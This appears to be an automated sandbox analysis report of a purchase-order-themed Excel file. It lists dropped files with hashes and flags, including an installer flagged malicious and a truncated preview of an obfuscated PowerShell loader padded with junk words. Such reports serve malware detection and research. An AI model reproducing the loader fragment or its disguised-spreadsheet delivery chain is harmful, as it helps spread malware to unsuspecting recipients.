                                                                            Preview:...................................FL..................F.".. .....8.D................................................P.O. .:i.....+00.../C:\...................\.1.....>Y.>. PROGRA~3..D.......:..>Y.>*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1......W.x. MICROS~1..@.......:...W.x*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......WE...Programs..f.......:...WE.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......W.v..WINDOW~1..R.......:.,.W.v*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2......W.v .WINDOW~2.LNK..Z.......:.,.W.v*....]....................W.i.n.d.o.w.s.
                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):6045
                                                                            Entropy (8bit):3.594929128718409
                                                                            Encrypted:false
                                                                            SSDEEP:96:HXhQC4O4IaqvsqvJCwoxet17vH+iJ17vHKic:HXGaoxetMiJwic
                                                                            MD5:5906BB14A16B030E6BD3D6FFAB167177
                                                                            SHA1:55C12313C7552AC731F02315B24F358BD72C3688
                                                                            SHA-256:99BC473532D017B74B561D45CB23C7827527F080494A6FD4FD7EE9D7518F5033
                                                                            SHA-512:5988E3BD1F187CAA4C2639AAAE30EF1D76FCE721BAA3B0FACCDC4FE02BE48D88A1A43B6752B578CB3BC6A6C46F9C56CDC9132877618EE851194398D822C23243
                                                                            Malicious:false
                                                                            Preview:...................................FL..................F.".. .....8.D................................................P.O. .:i.....+00.../C:\...................\.1.....>Y.>. PROGRA~3..D.......:..>Y.>*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1......W.x. MICROS~1..@.......:...W.x*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......WE...Programs..f.......:...WE.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......W.v..WINDOW~1..R.......:.,.W.v*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2......W.v .WINDOW~2.LNK..Z.......:.,.W.v*....]....................W.i.n.d.o.w.s.
                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):6045
                                                                            Entropy (8bit):3.594929128718409
                                                                            Encrypted:false
                                                                            SSDEEP:96:HXhQC4O4IaqvsqvJCwoxet17vH+iJ17vHKic:HXGaoxetMiJwic
                                                                            MD5:5906BB14A16B030E6BD3D6FFAB167177
                                                                            SHA1:55C12313C7552AC731F02315B24F358BD72C3688
                                                                            SHA-256:99BC473532D017B74B561D45CB23C7827527F080494A6FD4FD7EE9D7518F5033
                                                                            SHA-512:5988E3BD1F187CAA4C2639AAAE30EF1D76FCE721BAA3B0FACCDC4FE02BE48D88A1A43B6752B578CB3BC6A6C46F9C56CDC9132877618EE851194398D822C23243
                                                                            Malicious:false
                                                                            Preview:...................................FL..................F.".. .....8.D................................................P.O. .:i.....+00.../C:\...................\.1.....>Y.>. PROGRA~3..D.......:..>Y.>*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1......W.x. MICROS~1..@.......:...W.x*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......WE...Programs..f.......:...WE.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......W.v..WINDOW~1..R.......:.,.W.v*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2......W.v .WINDOW~2.LNK..Z.......:.,.W.v*....]....................W.i.n.d.o.w.s.
                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):6045
                                                                            Entropy (8bit):3.594929128718409
                                                                            Encrypted:false
                                                                            SSDEEP:96:HXhQC4O4IaqvsqvJCwoxet17vH+iJ17vHKic:HXGaoxetMiJwic
                                                                            MD5:5906BB14A16B030E6BD3D6FFAB167177
                                                                            SHA1:55C12313C7552AC731F02315B24F358BD72C3688
                                                                            SHA-256:99BC473532D017B74B561D45CB23C7827527F080494A6FD4FD7EE9D7518F5033
                                                                            SHA-512:5988E3BD1F187CAA4C2639AAAE30EF1D76FCE721BAA3B0FACCDC4FE02BE48D88A1A43B6752B578CB3BC6A6C46F9C56CDC9132877618EE851194398D822C23243
                                                                            Malicious:false
                                                                            Preview:...................................FL..................F.".. .....8.D................................................P.O. .:i.....+00.../C:\...................\.1.....>Y.>. PROGRA~3..D.......:..>Y.>*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1......W.x. MICROS~1..@.......:...W.x*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......WE...Programs..f.......:...WE.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......W.v..WINDOW~1..R.......:.,.W.v*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2......W.v .WINDOW~2.LNK..Z.......:.,.W.v*....]....................W.i.n.d.o.w.s.
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                            Category:dropped
                                                                            Size (bytes):990768
                                                                            Entropy (8bit):6.298838855552093
                                                                            Encrypted:false
                                                                            SSDEEP:12288:5Ly0W0exb+S7/6eALmQXhts30QmskXnnAEkINz3WSVgl:5Ly05wCmQXw30Ek3AgNz3Sl
                                                                            MD5:450228D72F9F726B645C55BBBC6DB905
                                                                            SHA1:B26075C51A4681F2FF7407188F5E9480545A7ACA
                                                                            SHA-256:9124D7696D2B94E7959933C3F7A8F68E61A5CE29CD5934A4D0379C2193B126BE
                                                                            SHA-512:4795D090447D237CBE1A044FFE78E8CD0C9BE358DF778673B4713EAB2C324056A7701D22B827B95B2413845089FA71AC81A4F47CC8BCDBABAD34845E64B4E090
                                                                            Malicious:true
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf.sV..Pf..V`..Pf.Rich.Pf.........................PE..L...'.uY.................d...*......=3............@.................................7/....@..........................................................................................................................................................text...mb.......d.................. ..`.rdata...............h..............@..@.data................|..............@....ndata...................................rsrc...............................@..@................................................................................................................................................................................................................................................................................................................................................
                                                                            Process:C:\Users\user\AppData\Roaming\dllhost.exe
                                                                            File Type:ASCII text, with very long lines (3095), with CRLF, LF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):53853
                                                                            Entropy (8bit):5.3041850938045645
                                                                            Encrypted:false
                                                                            SSDEEP:1536:Yb2DFjNKjwJJCwZuTEaiwLAm7C24yWjc2:YSrvJEwZtwM6qg2
                                                                            MD5:552ED0904239D64DB1895620B38DC799
                                                                            SHA1:8A6A6C6EFD31B04C716CDE1783B45783F2843E20
                                                                            SHA-256:D4D98FDBE306D61986BED62340744554E0A288C5A804ED5C924F66885CBF3514
                                                                            SHA-512:21F283AC39223437470036EC08EB01BF40C4A0C45EA5B94BB4D902CF66923DB4D14641CE68370D240AB2B213527552DFDE13EB1FF4B21A0BBF0C1EE6AED7ADE7
                                                                            Malicious:true
                                                                            Preview:$Overofficered=$Messingflaskers;..<#Skridende Voldgifternes Holdet Kharijite himmerigsmundfuld Paraphernalian Overtallets #>..<#Sprngsikreste Farvebilleder Presentation cervix Throughcome #>..<#Monepiscopal Lnrelation Unresponsibly Dekompressionsventil Xerographer Outset #>..<#Ligbrnding Ligustrenes Snedkereres Sarkasmernes Transformism Gennembladet Attackable #>..<#Altertavlens Arsenets Indeks #>..<#Reconciliative Pimpet Efteraarene Saxonic Thornton Chumpish Reservistens #>...$Bygmestres = @'.Woyaw.Promi$ CalidTreleiR,gioaM.sogl store KartkMetabtJ gtloPetrol regeo upeg aioc= Sque$ artinKendse illau Pi,trAnx oaMe.lsdReoxi;ud ty.Noncof.eathu Shikn,runkc V umtDistri,aghjoParadn O.ga MiraS xploa dornmStr tmSidewePol.dnTapethsi,mefRetrit,nergePeramrYo.im Skos(ghoul$ PaasV.aturiFollosTelefeGen er Nethe Ekstd ugeneTematsMekan, Resu$.isefPPresyoHotpllGdnineSinkem murro WintnPol oiUgleruAnomamBefor)Parag ri sw{Resho.Shoya.Tnkem$PropoOKammep Ru kvA chskSeneskSylloeMindstVivis1Carri4vandd9Str
                                                                            Process:C:\Users\user\AppData\Roaming\dllhost.exe
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):385193
                                                                            Entropy (8bit):1.2513468259126719
                                                                            Encrypted:false
                                                                            SSDEEP:768:aEMZI3FIfIoASNikk5oeF4qQ7kjt8IrwghWyIgttkVVaxtWJjwHwUZJLPS/UpQFs:4IM85MQZxPWpILCm58b9QeiKhsRR7U
                                                                            MD5:C73A822A5DC42DEF82529419505D4D34
                                                                            SHA1:2F09CC0773FD145E60C4C20F9B8085624D0960A6
                                                                            SHA-256:99EECD9B8808E7B171AE3B9E08B1EFE75CBA0BAFDE4ECF1D240A2BA1F28EC637
                                                                            SHA-512:C6AAE8D60B43A7D7D1C287F70D91B35E914B0B4C53449B34D3E9D773C7909395755D9266FC4BA88648BC4E94614E550877D1DF54CB7547274D3EEA35ECFAA910
                                                                            Malicious:false
                                                                            Preview:........].........................................................$.....$.........................................................................................(..........................................................9..........................s...............................................................................................................................................................................A............................................................~................................F...B........s.....................................X...?.....................M.......................I..................................................................................................SJ............3.K.......M.........................................................................................................................................................7....._.................................E............................................K..................
                                                                            Process:C:\Users\user\AppData\Roaming\dllhost.exe
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):413966
                                                                            Entropy (8bit):1.2545701143598162
                                                                            Encrypted:false
                                                                            SSDEEP:1536:b2T3E/ySYfBk8nalEPTUh6Va4fPKCPdsqNQj:ij9fBk8alsUhH8js6c
                                                                            MD5:2563D98DE6469D9979963EFD8D66736D
                                                                            SHA1:4D98E68617BE777AB97514BDF59CA98AA1102C5F
                                                                            SHA-256:B7423FE1148A2EA0E5BDE3855DFAB272400202AD01A2402F76E6E5F7DD5E0AE5
                                                                            SHA-512:C3FDB8870482B6C1A08A3088ED4539746E4F5DFAF63C8AD5F7B7873D2F3FC4FE8945493888422C487F5DB1E216A289A431890E6100A1A10C4ED6BCB2DD8CBBA4
                                                                            Malicious:false
                                                                            Preview:.....c.........../..............................u.....................................................................................h......2...............................................*...l...........................;.....................n......a......................I...........................x.;...............................................................................................................................................M....................._...............................................................+...c.....;.j........................................2.........................................................I......................................o..........d.........A.....4.....................r..........................p...........................................................T........................................................................L.......................................................G.............................,.....................
                                                                            Process:C:\Users\user\AppData\Roaming\dllhost.exe
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):257970
                                                                            Entropy (8bit):1.256808441775652
                                                                            Encrypted:false
                                                                            SSDEEP:1536:KcEgmiyf7PGBgwWjC81son6i0q8s0If3y:WDLGoB0q8K3
                                                                            MD5:9F966EC38C037968BA52C7C6A58EAED1
                                                                            SHA1:31BC370E88A2A10950D4C3AE24C28DF7E2D89868
                                                                            SHA-256:B4B70294B142D598F5E391EE8D371014C4AEFA8272754CE0094A8F802ADFA1DA
                                                                            SHA-512:6DE9F14B990B44336B01DF665F6D1C46B6076C10F1CC40D45DAA009110D9BA51E871599422E486E7264FE251EC560E9922CB959DAE6C6B12CC8B6AF6D720C581
                                                                            Malicious:false
                                                                            Preview:..|.....K.............................................................................................{...................................................(......................A............M......................(........W...t..............e............................................................<.....................................................................s.............................................................................................................................L.............................B............/............................................................../..............................w..[......................_.............................................................................T.............o.(....%.........................................n.........J.....................................E.....=...............................................................B......................................y...................................k....
                                                                            Process:C:\Users\user\AppData\Roaming\dllhost.exe
                                                                            File Type:ASCII text, with very long lines (359), with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):359
                                                                            Entropy (8bit):4.308814426836422
                                                                            Encrypted:false
                                                                            SSDEEP:6:BSX8gnAA04KQeCVNcTKwLD3YAP7bqJINNQUmAdlvKRScZRIOrSeNRRAAefDPJzMA:wdAAMAszL8vJaNFmO0RSGDHRCNYR02yR
                                                                            MD5:2F193BC3BEEF5356ACF62CB12C2C4EF8
                                                                            SHA1:6E868DFB3D7ACB1D2C56E0EFA292CD7CF0DEC661
                                                                            SHA-256:10F1E86374C489E6FFC58B8213423687440ADDC3E483F5C84BE1F34D5DA23754
                                                                            SHA-512:4D5A2B7BD1C9A034A9A481BAA6C6D5D530AF5B3F95C8B1028C4DAB96FFA6199071E30CF1EB462B790AC845AA8BEAE34A0800741FBAC10242A3F38904593200EB
                                                                            Malicious:false
                                                                            Preview:succesforfattere homogamous monkeyishly funktionsstarts phylactolaemata.sextodecimos danmarkspremiere marrietta ancience.brisks grippelike hulebeboere flovmnds retrterne,roxbury marmorgulvets apogamic delprogrammers pips,selvglad polyhistorian flunkeyish deklasserings gidjee regnskabsinformationens,plasma anstandsdamernes pompejansk afmnstre afstbningernes,
                                                                            Process:C:\Users\user\AppData\Roaming\dllhost.exe
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):358391
                                                                            Entropy (8bit):7.608272187839353
                                                                            Encrypted:false
                                                                            SSDEEP:6144:6sUrRFXb4UwLDUxrycWgPzYnSH5F5vMu9wSvgzp3EWEFAWZS67RzFEQDnaV9m:TUFyiecWgP8SZrkuC9d3EWEmU+c29m
                                                                            MD5:14C1D52F24F29389597B36DCFC90B95A
                                                                            SHA1:A2578253F17B5F0EF989965DCB74AEBB60763B2D
                                                                            SHA-256:F9B744D0223EFE3C01C94D526881A95523C2F5E457F03774DD1D661944E60852
                                                                            SHA-512:4DDE50C0B37E51B944A7A61866730E53E96773E28C35260DCAE1EB38805251C3BA8E72C5D33AE2CB8D7486A4D3C6C180EC4560E3C20A6C535CA3A70AAC158710
                                                                            Malicious:false
                                                                            Preview:............z.ZZZ....00000............................z.66.....%%%%%%%.........1....)).............................H......'..fff...*......................^.FFF...H.11.6..,......................................................D..UUUUU...rrrr............ .............>>..[.....:::::...m.......ll..............,,,,,.....__....|....S....................."".............A....22.L...I.....44.\\.............ee......&.........................[[[[........dd...h.||||................................TT..............77..z.f.f....[..........|...KK.......................$.......................!.......JJJ...........................S...............................R...""........D..........C.{.....N..dddd..==.....22.........A...........y.z.............U..**..''...............................G...S..........'..PP....MMMMMM......i.....22..........\......]...........j...............A...##...\.0........................................}.............ll........9999......................<.f...........)..........Q
                                                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                            File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Mon Sep 30 08:53:41 2024, Security: 1
                                                                            Category:dropped
                                                                            Size (bytes):647168
                                                                            Entropy (8bit):7.982893970497192
                                                                            Encrypted:false
                                                                            SSDEEP:12288:F5supCImwV85Jr8BooDS560fLgp0Ua70l1IgEkdo1umdpTen267s:Xplmkqr8J34LY0/O1IgEkdYTen267
                                                                            MD5:7EFDA572816A30F414F32C5B424D1965
                                                                            SHA1:996D99E1E5BA7E34DA7DB580DC736584C283BA5F
                                                                            SHA-256:30BA7397D242A331F26E32B2C8195AC8ECA6FA07AF13253AD14E4826C79D4700
                                                                            SHA-512:27634C04513E73C0505EB724BDCDC22AB3E7FE03F31F0E165882BBB0A39686FF3BAFC0E5F00820FE9293C7406D5ADCF0121FEB8FC0D17FDC9414B2F2EB32ABC4
                                                                            Malicious:false
                                                                            Preview:......................>...................................9...................|.......~...............b.......d........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...........;.......=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...
                                                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                            File Type:ASCII text, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):26
                                                                            Entropy (8bit):3.95006375643621
                                                                            Encrypted:false
                                                                            SSDEEP:3:ggPYV:rPYV
                                                                            MD5:187F488E27DB4AF347237FE461A079AD
                                                                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                            Malicious:false
                                                                            Preview:[ZoneTransfer]....ZoneId=0
                                                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                            File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Mon Sep 30 08:53:41 2024, Security: 1
                                                                            Category:dropped
                                                                            Size (bytes):647168
                                                                            Entropy (8bit):7.982893970497192
                                                                            Encrypted:false
                                                                            SSDEEP:12288:F5supCImwV85Jr8BooDS560fLgp0Ua70l1IgEkdo1umdpTen267s:Xplmkqr8J34LY0/O1IgEkdYTen267
                                                                            MD5:7EFDA572816A30F414F32C5B424D1965
                                                                            SHA1:996D99E1E5BA7E34DA7DB580DC736584C283BA5F
                                                                            SHA-256:30BA7397D242A331F26E32B2C8195AC8ECA6FA07AF13253AD14E4826C79D4700
                                                                            SHA-512:27634C04513E73C0505EB724BDCDC22AB3E7FE03F31F0E165882BBB0A39686FF3BAFC0E5F00820FE9293C7406D5ADCF0121FEB8FC0D17FDC9414B2F2EB32ABC4
                                                                            Malicious:true
                                                                            Preview:......................>...................................9...................|.......~...............b.......d........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...........;.......=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...
                                                                            Process:C:\Users\user\AppData\Roaming\dllhost.exe
                                                                            File Type:MS Windows shortcut, Item id list present, Has Relative path, Has Working directory, ctime=Sun Dec 31 23:06:32 1600, mtime=Sun Dec 31 23:06:32 1600, atime=Sun Dec 31 23:06:32 1600, length=0, window=hide
                                                                            Category:dropped
                                                                            Size (bytes):1148
                                                                            Entropy (8bit):3.1392519442107463
                                                                            Encrypted:false
                                                                            SSDEEP:12:8wl0ERYTXCG7GyuR+/fGySlIcI+q1Q1AlZw1MJEbWl5y6pLl//NJkKAB3YilMME6:84iSUqRQIScIbqabwq8WLJ1NVHAx3q
                                                                            MD5:E38CBE409E70331609E77613E9B2A8B9
                                                                            SHA1:2F215CC8C9420FD1030A3ACE58A31A4A674E45C6
                                                                            SHA-256:C0EC11F4546B3D4EBE3585E575DFAFD458EE6F107672CBD41AF2F5C1B9A4DE31
                                                                            SHA-512:DA6FB6F967B27C2F433A520DCFC2BBF3A849C7076963B4ADE2958063C2CA2932CAB282683F193F58593AB7DD7C9DE78909F2C62ACD927EDE3F5C60A3A41735A6
                                                                            Malicious:false
                                                                            Preview:L..................F........................................................c....P.O. .:i.....+00.../C:\...................L.1...........Users.8..............*.........................U.s.e.r.s.....L.1...........user.8..............*.........................A.l.b.u.s.....R.1...........AppData.<..............*.........................A.p.p.D.a.t.a.....L.1...........Local.8..............*.........................L.o.c.a.l.....J.1...........Temp..6..............*.........................T.e.m.p.....\.1...........nsmA3F.tmp..B..............*.........................n.s.m.A.3.F...t.m.p.....X.2...........cueca.Stu.@..............*.........................c.u.e.c.a...S.t.u.......6.....\.U.s.e.r.s.\.A.l.b.u.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.n.s.m.A.3.F...t.m.p.\.c.u.e.c.a...S.t.u.K.C.:.\.U.s.e.r.s.\.A.l.b.u.s.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.i.n.t.e.r.c.e.s.s.i.o.n.a.t.e.\.F.a.v.o.u.r.a.b.l.i.e.s.1.1.7.\.s.u.l.f.o.n.y.l.u.r.e.a.........(.................l^".`G...3..qs.........
                                                                            File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Sun Sep 29 19:08:11 2024, Security: 1
                                                                            Entropy (8bit):7.965030858056194
                                                                            TrID:
                                                                            • Microsoft Excel sheet (30009/1) 47.99%
• Microsoft Excel sheet (alternate) (24509/1) 39.20%
• Generic OLE2 / Multistream Compound File (8008/1) 12.81%
File name: PO 11001 .xls
File size: 656'896 bytes
MD5: c032108824b5b2e9075e6216300794ad
SHA1: f7517cdb21e84b14cc8b0a6bd7de1aa2d5804568
SHA256: eee751a9781787e72e2666b344b5262abac000f1abc8a090af60b574401e6b79
SHA512: 7c592eeb9aa0dd36677e1ef463166be848b77e5ccd36763f2a29e11e7efa1abebd8b425f595defccc378f4732bb8934f8aa15a8ad3d4056cf891dc01d4bdfc65
SSDEEP: 12288:1qOop2JIrVDhls1aZykDcnd4SpHkfGGXkZvuzP7NPO:1qP2Jabs0ykDcnRsJ0ZvGPFO
TLSH: 3BD4232E30E8C713C1879ABA4CC9249F9459FE175BB6C8AB7A8433BFD4333948C85654
File Content Preview: ........................>...................................9...................|.......~...............b.......d..............................................................................................................................................
Icon Hash: 276ea3a6a6b7bfbf
Document Type: OLE
Number of OLE Files: 1
Has Summary Info:
Application Name: Microsoft Excel
Encrypted Document: True
Contains Word Document Stream: False
Contains Workbook/Book Stream: True
Contains PowerPoint Document Stream: False
Contains Visio Document Stream: False
Contains ObjectPool Stream: False
Flash Objects Count: 0
Contains VBA Macros: True
Code Page: 1252
Author:
Last Saved By:
Create Time: 2006-09-16 00:00:00
Last Saved Time: 2024-09-29 18:08:11
Creating Application: Microsoft Excel
Security: 1
Document Code Page: 1252
Thumbnail Scaling Desired: False
Contains Dirty Links: False
Shared Document: False
Changed Hyperlinks: False
Application Version: 786432
General
Stream Path: _VBA_PROJECT_CUR/VBA/Sheet1
VBA File Name: Sheet1.cls
Stream Size: 977
Data ASCII: . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . > . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - . 0
Data Raw: 01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 db f3 3e c5 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

General
Stream Path: _VBA_PROJECT_CUR/VBA/Sheet2
VBA File Name: Sheet2.cls
Stream Size: 977
Data ASCII: . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . c . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - . 0
Data Raw: 01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 db f3 fb 63 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

General
Stream Path: _VBA_PROJECT_CUR/VBA/Sheet3
VBA File Name: Sheet3.cls
Stream Size: 977
Data ASCII: . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . / . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - . 0
Data Raw: 01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 db f3 ea 2f 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

General
Stream Path: _VBA_PROJECT_CUR/VBA/ThisWorkbook
VBA File Name: ThisWorkbook.cls
Stream Size: 985
Data ASCII: . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 1 . 9 . - .
